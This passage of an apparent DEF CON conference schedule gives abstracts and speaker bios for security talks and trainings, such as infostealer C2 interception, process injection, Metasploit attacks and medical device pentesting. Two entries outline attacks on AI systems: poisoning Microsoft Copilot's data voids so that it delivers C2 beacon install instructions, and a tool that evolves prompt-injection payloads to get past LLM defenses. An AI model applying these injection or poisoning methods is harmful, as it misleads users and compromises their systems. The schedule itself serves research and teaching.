In this talk, the speaker details how a threat actor’s OPSEC slip—testing their own keylogger and infostealer on their hacking machine—provided a real-time view into a cybercrime operation. By intercepting Telegram-based command-and-control (C2) communications, the speaker obtained hundreds of screenshots and keylogs of the threat actors desktop, revealing the entire cybercrime operation. The session also covers the creation of Telegram bot tokens, which were then embedded in malware to enable covert data exfiltration and remote control.

Through automated analysis techniques, including VirusTotal and custom YARA rules, the speaker tracked samples communicating with Telegram’s API, extracted thousands of bot tokens that were used to forward stolen data, used these to intercept communications, and mapped backend infrastructure through screenshots of the threat actors desktop. This process led to the discovery of links to broader phishing and malware campaigns, underscoring how trusted platforms like Telegram can be abused by malicious actors.

References:

SpeakerBio:  Ben "polygonben" Folland

Ben Folland is a Security Operations Analyst at Huntress, where he manages hands-on-keyboard intrusions and dismantles active threats daily. Before that, he worked at one of Accenture’s SOCs, defending UK Critical National Infrastructure, gaining deep experience in high-stakes environments. He's all about DFIR, malware analysis, and threat hunting—and has a knack for exposing adversary tradecraft. Ben's spoken at over 10 conferences (including six BSides), taught SOC workshops at universities, is GIAC GCFA certified, and was a finalist for the UKs national cyber team. Whether it's CTFs or live incidents, Ben thrives on the chase and brings a hacker mindset to everything he does.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 15:30-16:15 PDT


Title: Mastering Apple's Endpoint Security for Advanced macOS Malware Detection
When: Friday, Aug 8, 15:30 - 16:15 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Five years after Apple radically empowered third-party security developers on macOS with the introduction of Endpoint Security, most developers grasp its fundamentals, but subtle nuances remain, and advanced features are still underutilized. And as the framework continues to evolve, even experienced developers can struggle to keep pace with its rapidly expanding capabilities.

This talk explores critical areas that frequently trip up developers, such as caching behaviors and authorization deadlines, before diving into Endpoint Security’s more advanced features like mute inversions. We'll also cover recently introduced capabilities—including the long-awaited TCC event monitoring which offer unprecedented visibility into permission-related activity often targeted by malware.

Each topic will include practical code examples, demonstrated and validated against sophisticated macOS malware.

Join us to move beyond the basics and unlock the full power of Apple's Endpoint Security framework.

References:

SpeakerBio:  Patrick Wardle

Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 09:00-12:59 PDT


Title: Medical Device Hacking: 201
When: Friday, Aug 8, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N260 - Map

Description:

This hands-on course provides an in-depth exploration of Medical Device Penetration Testing, equipping security professionals with the skills to identify and exploit vulnerabilities in medical technologies. Participants will engage in practical exercises covering device board analysis and attacks, external network threats, bypassing kiosk controls, Windows and Linux post-exploitation techniques, and execution restriction bypasses. By leveraging real-world scenarios, this course ensures a comprehensive understanding of modern security risks and defense strategies in medical environments.

Speakers:Michael "v3ga" Aguilar,Alex "cheet" Delifer

SpeakerBio:  Michael "v3ga" Aguilar, Principal Consultant at Sophos Red Team

Michael Aguilar (v3ga) is a Principal Consultant for Sophos Red Team. He leads efforts in Medical Device testing, Adversarial Simulations, Physical Security assessments, Network testing and more. Currently, he has 8 CVE vulnerabilities aligned with security issues located during testing at DEF CON's Biohacking Village Device Lab. He has also led the winning team of the DEF CON Biohacking Village CTF for two consecutive years.

SpeakerBio:  Alex "cheet" Delifer

A seasoned medical device red team hacker with nearly a decade in the trenches, Alex Delifer (cheet) breaks stuff so others can sleep at night. He operates out of an unnamed medtech company, where he regularly tears through embedded systems, surgical robots, industrial controllers, APIs, and BIOS firmware like it’s target practice. A Biohacking Village Capture the Flag Champion at DEF CON, he’s known in some circles as the medical device testing sledgehammer—swinging hard, finding the flaws others miss, and leaving no UART unturned.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Saturday - 08:00-16:59 PDT


Title: Medical Device Penetration Testing
When: Saturday, Aug 9, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration

The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Medical Device Penetration Testing
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration

The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Medical Device Penetration Testing
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration

The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Medical Device Penetration Testing
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration

The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Sunday - 10:00-13:59 PDT


Title: Memorial Chamber Open
When: Sunday, Aug 10, 10:00 - 13:59 PDT
Where: LVCCWest-Level3-W302 - Map

Description:

The DEF CON Memorial Chamber serves as a sacred space within our community — a place where we pause to honor those hackers whose brilliance and dedication have elevated not just our craft, but the entire security ecosystem. Here we remember figures whose generous spirit and willingness to coordinate security fixes demonstrated that true hacking greatness lies in collaboration. We are here because DEF CON has been the beating heart of the hacker community for over three decades, growing from 100 people in 1993 to the world's largest hacker conference. As Jeff Moss envisioned, DEF CON is what we make of it, this memorial space represents our commitment to ensuring that the legacy of those we've lost continues to inspire future generations of hackers to pursue knowledge, build community, and use their gifts to make the world better.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 10:00-17:59 PDT


Title: Memorial Chamber Open
When: Friday, Aug 8, 10:00 - 17:59 PDT
Where: LVCCWest-Level3-W302 - Map

Description:

The DEF CON Memorial Chamber serves as a sacred space within our community — a place where we pause to honor those hackers whose brilliance and dedication have elevated not just our craft, but the entire security ecosystem. Here we remember figures whose generous spirit and willingness to coordinate security fixes demonstrated that true hacking greatness lies in collaboration. We are here because DEF CON has been the beating heart of the hacker community for over three decades, growing from 100 people in 1993 to the world's largest hacker conference. As Jeff Moss envisioned, DEF CON is what we make of it, this memorial space represents our commitment to ensuring that the legacy of those we've lost continues to inspire future generations of hackers to pursue knowledge, build community, and use their gifts to make the world better.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 10:00-17:59 PDT


Title: Memorial Chamber Open
When: Saturday, Aug 9, 10:00 - 17:59 PDT
Where: LVCCWest-Level3-W302 - Map

Description:

The DEF CON Memorial Chamber serves as a sacred space within our community — a place where we pause to honor those hackers whose brilliance and dedication have elevated not just our craft, but the entire security ecosystem. Here we remember figures whose generous spirit and willingness to coordinate security fixes demonstrated that true hacking greatness lies in collaboration. We are here because DEF CON has been the beating heart of the hacker community for over three decades, growing from 100 people in 1993 to the world's largest hacker conference. As Jeff Moss envisioned, DEF CON is what we make of it, this memorial space represents our commitment to ensuring that the legacy of those we've lost continues to inspire future generations of hackers to pursue knowledge, build community, and use their gifts to make the world better.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 13:00-13:45 PDT


Title: Messenger - Proxies Here There and Everywhere
When: Friday, Aug 8, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

Proxies, along with local, reverse, and dynamic forwards, enable red teams to maintain persistent access and move laterally within target environments. By combining these techniques, operators can construct sophisticated attack chains that enable deep network access through multiple segmented environments. This presentation will dive into the setup, usage, and attacker techniques required to be effective with proxies. To demonstrate these techniques, the presenters will use a publicly available tunneling toolkit, Messenger.

Speakers:Skyler Knecht,Kevin Clark

SpeakerBio:  Skyler Knecht

Skyler is a Senior Security consultant at SpecterOps, where he performs security assessments for Fortune 500 organizations. With over six years of experience, he focuses on initial access research and contributes to the security community through open-source development and conference presentations. Skyler has presented at DEF CON and BSides and actively collaborates on open-source projects such as Messenger, Ek47, Connect, and Metasploit. He also conducts vulnerability research, having discovered multiple zero-day vulnerabilities in enterprise software.

SpeakerBio:  Kevin Clark, Red Team Instructor at BC Security

Kevin Clark is a Security Consultant with TrustedSec and a Red Team Instructor with BC Security, with a diverse background in software development, penetration testing, and offensive security operations. Kevin specializes in initial access techniques and Active Directory exploitation. He has contributed to open-source projects such as PowerShell Empire and developed custom security toolkits, including Badrats and Ek47. A skilled trainer and speaker, Kevin has delivered talks and conducted training sessions all over the country at cybersecurity conferences, including Black Hat and DEF CON, and authors a cybersecurity blog at https://henpeebin.com/kevin/blog.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 13:00-13:45 PDT


Title: Messenger - Proxies Here There and Everywhere
When: Saturday, Aug 9, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Proxies, along with local, reverse, and dynamic forwards, enable red teams to maintain persistent access and move laterally within target environments. By combining these techniques, operators can construct sophisticated attack chains that enable deep network access through multiple segmented environments. This presentation will dive into the setup, usage, and attacker techniques required to be effective with proxies. To demonstrate these techniques, the presenters will use a publicly available tunneling toolkit, Messenger.

Speakers:Skyler Knecht,Kevin Clark

SpeakerBio:  Skyler Knecht

Skyler is a Senior Security consultant at SpecterOps, where he performs security assessments for Fortune 500 organizations. With over six years of experience, he focuses on initial access research and contributes to the security community through open-source development and conference presentations. Skyler has presented at DEF CON and BSides and actively collaborates on open-source projects such as Messenger, Ek47, Connect, and Metasploit. He also conducts vulnerability research, having discovered multiple zero-day vulnerabilities in enterprise software.

SpeakerBio:  Kevin Clark, Red Team Instructor at BC Security

Kevin Clark is a Security Consultant with TrustedSec and a Red Team Instructor with BC Security, with a diverse background in software development, penetration testing, and offensive security operations. Kevin specializes in initial access techniques and Active Directory exploitation. He has contributed to open-source projects such as PowerShell Empire and developed custom security toolkits, including Badrats and Ek47. A skilled trainer and speaker, Kevin has delivered talks and conducted training sessions all over the country at cybersecurity conferences, including Black Hat and DEF CON, and authors a cybersecurity blog at https://henpeebin.com/kevin/blog.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 15:30-16:15 PDT


Title: Metal-as-a-Disservice: Exploiting Legacy Flaws in Cutting-Edge Clouds
When: Saturday, Aug 9, 15:30 - 16:15 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

Bare metal cloud providers are rapidly gaining popularity among organizations deploying high-performance machine learning workloads. While the promise of dedicated hardware and enhanced security may appear attractive, a closer look revealed that these environments are vulnerable to decades-old attacks that are sure to trigger nostalgia.

This talk investigates the hidden risks posed by the "bare metal" trend, illustrating how weaknesses in firmware, hardware, and the network can lead to catastrophic multi-tenant compromise. We'll walk through real-world case examples demonstrating how attackers can leverage these vulnerabilities including hijacking provisioning processes, installing persistent firmware implants, intercepting sensitive network data, and compromising secure machine learning workflows.

Attendees will gain insight into the unique attack surfaces of bare metal environments, understand why seemingly outdated techniques remain highly effective, and learn how major cloud providers mitigate these threats. Expect technical demonstrations, practical advice on evaluating providers, and recommendations for protecting your organization's critical infrastructure.

References:

1 2 3 4 5 6 7 8 9 10 11 12 13

SpeakerBio:  Bill Demirkapi

Bill is a security researcher with a passion for finding bugs at scale. His interests include reverse engineering and vulnerability research, ranging from low-level memory corruption to systemic flaws with catastrophic consequences. He started his journey in high school and has since published his work at internationally-recognized conferences like DEF CON and Black Hat USA. In his pursuit to make the world a better place, Bill constantly looks for the next significant vulnerability, following the motto "break anything and everything".


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 16:00-16:45 PDT


Title: Metasploit's Latest Attack Capability and Workflow Improvements
When: Saturday, Aug 9, 16:00 - 16:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

Metasploit continues to expand support for Active Directory Certificate Services attacks, as well as its protocol relaying capability and attack workflows for evergreen vulnerabilities. This year, we added support for SMB-to-LDAP relaying and SMB-to-HTTP relaying, as well as support to identify and exploit a number of AD CS flaws. We’ve also added the new PoolParty process injection capability to Windows Meterpreter sessions, along with support for System Center Configuration Manager attack workflows.

Speakers:Spencer "ZeroSteiner" McIntyre,Jack Heysel

SpeakerBio:  Spencer "ZeroSteiner" McIntyre

Spencer is a senior security research manager at Rapid7, where he works on the Metasploit Framework. He has been contributing to Metasploit since 2010, a committer since 2014, and a core team member at Rapid7 since 2019. Previously, he worked at a consulting firm working with clients from various industries, including healthcare, energy, and manufacturing. He is an avid open source contributor and Python enthusiast.

SpeakerBio:  Jack Heysel

Jack is a senior security researcher at Rapid7, where he contributes to and helps maintain the Metasploit Framework. He started at Rapid7 in 2016 working on their vulnerability management solution. He transitioned to the Metasploit team in 2021 and has been happily writing and reviewing exploits ever since. While AFK, he enjoys exploring the mountains and outdoors that surround his home.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 14:00-14:45 PDT


Title: Metasploit's Latest Attack Capability and Workflow Improvements
When: Friday, Aug 8, 14:00 - 14:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Metasploit continues to expand support for Active Directory Certificate Services attacks, as well as its protocol relaying capability and attack workflows for evergreen vulnerabilities. This year, we added support for SMB-to-LDAP relaying and SMB-to-HTTP relaying, as well as support to identify and exploit a number of AD CS flaws. We’ve also added the new PoolParty process injection capability to Windows Meterpreter sessions, along with support for System Center Configuration Manager attack workflows.

Speakers:Spencer "ZeroSteiner" McIntyre,Jack Heysel

SpeakerBio:  Spencer "ZeroSteiner" McIntyre

Spencer is a senior security research manager at Rapid7, where he works on the Metasploit Framework. He has been contributing to Metasploit since 2010, a committer since 2014, and a core team member at Rapid7 since 2019. Previously, he worked at a consulting firm working with clients from various industries, including healthcare, energy, and manufacturing. He is an avid open source contributor and Python enthusiast.

SpeakerBio:  Jack Heysel

Jack is a senior security researcher at Rapid7, where he contributes to and helps maintain the Metasploit Framework. He started at Rapid7 in 2016 working on their vulnerability management solution. He transitioned to the Metasploit team in 2021 and has been happily writing and reviewing exploits ever since. While AFK, he enjoys exploring the mountains and outdoors that surround his home.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 15:00-15:45 PDT


Title: Metasploit's Latest Attack Capability and Workflow Improvements
When: Saturday, Aug 9, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

Metasploit continues to expand support for Active Directory Certificate Services attacks, as well as its protocol relaying capability and attack workflows for evergreen vulnerabilities. This year, we added support for SMB-to-LDAP relaying and SMB-to-HTTP relaying, as well as support to identify and exploit a number of AD CS flaws. We’ve also added the new PoolParty process injection capability to Windows Meterpreter sessions, along with support for System Center Configuration Manager attack workflows.

Speakers:Spencer "ZeroSteiner" McIntyre,Jack Heysel

SpeakerBio:  Spencer "ZeroSteiner" McIntyre

Spencer is a senior security research manager at Rapid7, where he works on the Metasploit Framework. He has been contributing to Metasploit since 2010, a committer since 2014, and a core team member at Rapid7 since 2019. Previously, he worked at a consulting firm working with clients from various industries, including healthcare, energy, and manufacturing. He is an avid open source contributor and Python enthusiast.

SpeakerBio:  Jack Heysel

Jack is a senior security researcher at Rapid7, where he contributes to and helps maintain the Metasploit Framework. He started at Rapid7 in 2016 working on their vulnerability management solution. He transitioned to the Metasploit team in 2021 and has been happily writing and reviewing exploits ever since. While AFK, he enjoys exploring the mountains and outdoors that surround his home.


Return to Index    -    Add to Google    -    ics Calendar file

DDV - Friday - 15:00-15:59 PDT


Title: MFT2: More Fungible Threats
When: Friday, Aug 8, 15:00 - 15:59 PDT
Where: LVCCWest-Level2-W225 - Map

Description:

Distributed data replication systems are more than just tools for redundancy—they’re fertile ground for creative abuse. In this talk, we explore how technologies like NFTs, IPFS, Codex, and Cloudflare R2 can become resilient C2 infrastructures, payload delivery systems, and phishing hosting that challenge takedown efforts. Welcome to the next phase of decentralized threats.

This sequel to “MFT: Malicious Fungible Tokens” explores how distributed data replication systems can be used for malicious purposes. We’ll demonstrate how technologies like Codex, WhenFS, IPFS, and Cloudflare R2 buckets can store and distribute C2 commands, payloads, and even phishing campaigns such as templates or client-side drainers. These systems enable infrastructures that are resistant to takedowns and, in some cases, nearly unstoppable. Through practical examples and live demonstrations, we’ll uncover the risks these systems pose and discuss their implications for security teams.

This talk is a continuation of "Everything is a C2 if you're brave enough" from Red Team Village and "MFT: Malicious Fungible Tokens" from Adversary Village, which explains how to turn NFTs into immortal C2 Servers. It is not needed to have attended these talks as a short recap will be featured.

Speakers:Mauro Eldritch,Nelson Colón

SpeakerBio:  Mauro Eldritch
No BIO available
SpeakerBio:  Nelson Colón
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DDV - Saturday - 15:00-15:59 PDT


Title: MFT2: More Fungible Threats
When: Saturday, Aug 9, 15:00 - 15:59 PDT
Where: LVCCWest-Level2-W225 - Map

Description:

Distributed data replication systems are more than just tools for redundancy—they’re fertile ground for creative abuse. In this talk, we explore how technologies like NFTs, IPFS, Codex, and Cloudflare R2 can become resilient C2 infrastructures, payload delivery systems, and phishing hosting that challenge takedown efforts. Welcome to the next phase of decentralized threats.

This sequel to “MFT: Malicious Fungible Tokens” explores how distributed data replication systems can be used for malicious purposes. We’ll demonstrate how technologies like Codex, WhenFS, IPFS, and Cloudflare R2 buckets can store and distribute C2 commands, payloads, and even phishing campaigns such as templates or client-side drainers. These systems enable infrastructures that are resistant to takedowns and, in some cases, nearly unstoppable. Through practical examples and live demonstrations, we’ll uncover the risks these systems pose and discuss their implications for security teams.

This talk is a continuation of "Everything is a C2 if you're brave enough" from Red Team Village and "MFT: Malicious Fungible Tokens" from Adversary Village, which explains how to turn NFTs into immortal C2 Servers. It is not needed to have attended these talks as a short recap will be featured.

Speakers:Mauro Eldritch,Nelson Colón

SpeakerBio:  Mauro Eldritch
No BIO available
SpeakerBio:  Nelson Colón
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 10:00-10:20 PDT


Title: Mind the Data Voids: Hijacking Copilot Trust to Deliver C2 Instructions with Microsoft Authority
When: Sunday, Aug 10, 10:00 - 10:20 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

In this session, Tobias Diehl will demonstrate a critical vulnerability in Microsoft’s CoPilot AI, exposing how data voids can be hijacked to manipulate AI-generated responses. By exploiting CoPilot’s reliance on limited data sources, Tobias will show how attackers can inject persistent malicious content, associating it with legitimate Microsoft topics, and how AI fails to validate key terms. The presentation will cover the mechanics of key term association attacks, data void exploitation, and their real-world implications, including the risk of CoPilot delivering dangerous installation instructions for command-and-control (C2) beacons for initial access. Using a proof-of-concept from Microsoft’s Zero Day Quest event, attendees will see how the hijacking process works in practice, how threat actors can target enterprise users, and how AI systems can be tricked into guiding users toward compromised actions.

References:

SpeakerBio:  Tobias "ItsSixtyNein" Diehl

Tobias Diehl is a security researcher and offensive security engineer with a background spanning red team operations, penetration testing, cloud security, and adversarial AI research. Over the past decade, he has worked across both private and public sectors, supporting enterprise defense teams and developing offensive tooling used to uncover high-impact vulnerabilities in modern systems. He is recognized as a Microsoft Most Valuable Researcher (MVR) for his continued contributions to vulnerability discovery and responsible disclosure across Microsoft platforms.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 11:00-11:50 PDT


Title: Mind vs. Machine: Finding the Sweet Spot in Modern Red Teaming
When: Friday, Aug 8, 11:00 - 11:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 1 - Map

Description:

This panel discusses at how teams use both automated tools and human thinking in red team operations. We'll talk about when automated tools work best, when human skills matter most, and how best to combine both approaches. Our panelists will share examples from their work showing the strengths and weaknesses of these approaches. Join us to learn practical ways to combine technology with human expertise for better red team engagements.

Speakers:Ben "nahamsec" Sadeghipour,Ryan "0day" Montgomery,Tyler Ramsbey,William Giles

SpeakerBio:  Ben "nahamsec" Sadeghipour, Co-Founder & CEO at HackingHub

Ben Sadeghipour, better known as NahamSec, is an ethical hacker, content creator, and keynote speaker. Over his career, Ben has uncovered thousands of security vulnerabilities for major organizations, including Amazon, Apple, Zoom, Meta, Google, and the U.S. Department of Defense. As a top-ranked bug bounty hunter, he is deeply passionate about cybersecurity education, regularly sharing his knowledge through his popular YouTube channel and speaking at major conferences like DEFCON and BSides. Beyond his personal achievements, Ben is committed to building the security community, organizing events that foster collaboration, innovation, and the next generation of offensive security professionals.

SpeakerBio:  Ryan "0day" Montgomery
No BIO available
SpeakerBio:  Tyler Ramsbey
No BIO available
SpeakerBio:  William Giles

William (Billy) Giles is an Offensive Security leader and practitioner who specializes in red/purple teaming, adversary emulation, and network penetration testing. With a deep passion for understanding and simulating adversary behaviors, he helps organizations across a multitude of industries assess their security postures, identify and remediate vulnerabilities, and build stronger defenses by thinking like an attacker.


Return to Index    -    Add to Google    -    ics Calendar file

CHV - Friday - 14:30-14:59 PDT


Title: Modern Odometer Manipulation
When: Friday, Aug 8, 14:30 - 14:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

while reading some automotive forums online, i stumbled upon an odometer manipulation device which claims to support 53 different car brands. curious, i purchase this tool with the sole intent of reverse engineering it. i tear down the hardware involved, explain how it is designed to be installed between the instrument panel cluster and the rest of the vehicle and use an open source exploit to extract the internal flash from the locked STM32. next, i explain the process of reverse engineering the extracted binary to find how the device is rewriting can messages to manipulate the odometer value. finally, i explain why odometer manipulation is an issue and share an example of how use of this device can potentially be detected after removal.

Speakers:collin,oblivion

SpeakerBio:  collin
No BIO available
SpeakerBio:  oblivion
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 14:00-14:50 PDT


Title: ModuleOverride – Changing a Tyre Whilst Driving
When: Friday, Aug 8, 14:00 - 14:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 3 - Map

Description:

This hands-on workshop introduces ModuleOverride, a novel technique for process injection, enabling the reuse of existing memory sections to inject and execute malicious shellcode within running Windows processes.

Participants will explore key challenges in security research and development, examining how certain constraints in shellcode generation—such as the inability to specify an exit function—can drive creative solutions, like dynamically patching shellcode within an active process during injection.

Attendees will engage in live demonstrations and interactive exercises, gaining first-hand experience as we walk through the final phase of the research, tackling technical hurdles encountered during development to ensure a successful process injection.

We’ll also hold an open discussion on detection strategies, encouraging participants to brainstorm and explore possible ways to identify ModuleOverride.

Speakers:Alessandro Grisa,Ibai Castells

SpeakerBio:  Alessandro Grisa

Alessandro Grisa is a member of CovertSwarm's Red Team Hive, focusing on malware development and exploring Windows internals. He also has a passion for hardware hacking and enjoys reverse engineering embedded devices. In his spare time, he plays the drums, plays tennis and spends time in the mountains

SpeakerBio:  Ibai Castells

Red Teamer and offensive security nerd obsessed with AD exploits, privilege escalation, and building custom offensive tooling.


Return to Index    -    Add to Google    -    ics Calendar file

ASV - Friday - 17:00-17:30 PDT


Title: Moonlight Defender - Purple Teaming in Space!
When: Friday, Aug 8, 17:00 - 17:30 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

The Moonlight Defender purple team exercise series provides a low-cost, modular, and scalable exercise framework for realistic space-cyber training—even in environments with restricted access, limited visibility, and contested information flows.

Designed and run by The Aerospace Corporation, MITRE, and AFRL, these exercises integrate purple teaming methodologies, enabling offensive and defensive cyber operators to refine their Tactics, Techniques, and Procedures (TTPs) in a high-fidelity, live-fire setting.

Moonlight Defender 1 (MD1) leveraged the Moonlighter satellite and Aerospace’s Dark Sky cyber range to train operators in adversarial emulation, space asset defense, and real-world cyber ops under extreme constraints. Building on this, Moonlight Defender 2 (MD2) introduced virtual satellite simulators, ICS/OT systems, and enterprise environments, pushing the limits of how we access and test cyber defenses in space-based systems.

These exercises broke down traditional silos and operationalized space hacking, proving that security through obscurity fails in space just as it does on Earth. Attendees will get a behind-the-scenes look at real-world space-cyber exercises, from attack chain development to defense strategy refinement, all within the context of operating under limited access and denied environments. Expect insights into methodologies, tools, lessons learned, and how the hacker community can shape the future of space-cyber operations.

SpeakerBio:  Ben Hawkins, The Aerospace Corporation
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Friday - 11:00-11:59 PDT


Title: More is less
When: Friday, Aug 8, 11:00 - 11:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

How extra features in Contactless Payments break Security


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 13:00-13:45 PDT


Title: MPIT - Matrix Prompt Injection Tool and ShinoLLMApps
When: Saturday, Aug 9, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Prompt injection is an emerging and poorly standardized attack vector targeting large language model applications. Unlike traditional vulnerabilities, there is no universal testing methodology or tooling, making it difficult for penetration testers to assess the security posture of LLM-integrated systems. Matrix Prompt Injection Tool aims to fill this gap by automating the generation of diverse prompt injection payloads. [1] Dynamic Input Detection: MPIT scans target websites to identify expected input fields where LLMs might process user requests. [2] Payload Enrichment: Each pattern includes crafted elements such as exploit strings, delimiters, and reasoning cues, enhancing the quality of the penetration test. [3] Genetic Algorithm Optimization: The tool employs a genetic algorithm to evolve and refine injection patterns, increasing their success rate significantly across different LLM defenses. [4] Practical Utility for Pentesters: MPIT is designed to support real-world offensive security assessments, making LLM-targeted testing more feasible and effective. ShinoLLMApps is a collection of vulnerable LLM web applications that use RAG and tools to help you test MPIT and better understand prompt injection and its risks. More info at github.com/Sh1n0g1/mpit and shinohack.me/shinollmapp.

Speakers:Shota "Sh1n0g1" Shinogi,Sasuke "Element138" Kondo

SpeakerBio:  Shota "Sh1n0g1" Shinogi

Shota is a security researcher at Macnica, pentest tools author, and CTF organizer. He is an expert in writing tools for red team to evade the detection from EDR, sandbox, IPS, antivirus, and other security solutions. His malware simulator ShinoBOT and ShinoLocker contributes to the cybersecurity industry to help the people who want to test malwares safely. He has more than 15 years of experience in the cybersecurity industry, starting his career with HDD encryption, NAC, IPS, WAF, sandbox, EDR, and penetration testing. He has spoken in several security and hacking conferences, including Black Hat, DEF CON, and BSidesLV. He also contributes to the education for the next generation security engineers through the Security Camp from 2015 consecutively in Japan.

SpeakerBio:  Sasuke "Element138" Kondo

Sasuke is a high school developer with a growing focus on LLM security. While relatively new to cybersecurity, he approaches it with a builder’s mindset shaped by his experience creating web applications for real-world use, such as supporting school operations. His interest in LLM vulnerabilities began at the 2024 Japan Security Camp, where he started developing MPIT, the prompt injector he first presented at CODE BLUE 2024 and is now bringing to DEF CON. Outside cybersecurity, he is a two-time silver medalist in Japan Linguistics Olympiad and a recent participant in Japan Olympiad in AI.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 14:00-14:45 PDT


Title: MPIT - Matrix Prompt Injection Tool and ShinoLLMApps
When: Friday, Aug 8, 14:00 - 14:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

Prompt injection is an emerging and poorly standardized attack vector targeting large language model applications. Unlike traditional vulnerabilities, there is no universal testing methodology or tooling, making it difficult for penetration testers to assess the security posture of LLM-integrated systems. Matrix Prompt Injection Tool aims to fill this gap by automating the generation of diverse prompt injection payloads. [1] Dynamic Input Detection: MPIT scans target websites to identify expected input fields where LLMs might process user requests. [2] Payload Enrichment: Each pattern includes crafted elements such as exploit strings, delimiters, and reasoning cues, enhancing the quality of the penetration test. [3] Genetic Algorithm Optimization: The tool employs a genetic algorithm to evolve and refine injection patterns, increasing their success rate significantly across different LLM defenses. [4] Practical Utility for Pentesters: MPIT is designed to support real-world offensive security assessments, making LLM-targeted testing more feasible and effective. ShinoLLMApps is a collection of vulnerable LLM web applications that use RAG and tools to help you test MPIT and better understand prompt injection and its risks. More info at github.com/Sh1n0g1/mpit and shinohack.me/shinollmapp.

Speakers:Shota "Sh1n0g1" Shinogi,Sasuke "Element138" Kondo

SpeakerBio:  Shota "Sh1n0g1" Shinogi

Shota is a security researcher at Macnica, pentest tools author, and CTF organizer. He is an expert in writing tools for red team to evade the detection from EDR, sandbox, IPS, antivirus, and other security solutions. His malware simulator ShinoBOT and ShinoLocker contributes to the cybersecurity industry to help the people who want to test malwares safely. He has more than 15 years of experience in the cybersecurity industry, starting his career with HDD encryption, NAC, IPS, WAF, sandbox, EDR, and penetration testing. He has spoken in several security and hacking conferences, including Black Hat, DEF CON, and BSidesLV. He also contributes to the education for the next generation security engineers through the Security Camp from 2015 consecutively in Japan.

SpeakerBio:  Sasuke "Element138" Kondo

Sasuke is a high school developer with a growing focus on LLM security. While relatively new to cybersecurity, he approaches it with a builder’s mindset shaped by his experience creating web applications for real-world use, such as supporting school operations. His interest in LLM vulnerabilities began at the 2024 Japan Security Camp, where he started developing MPIT, the prompt injector he first presented at CODE BLUE 2024 and is now bringing to DEF CON. Outside cybersecurity, he is a two-time silver medalist in Japan Linguistics Olympiad and a recent participant in Japan Olympiad in AI.


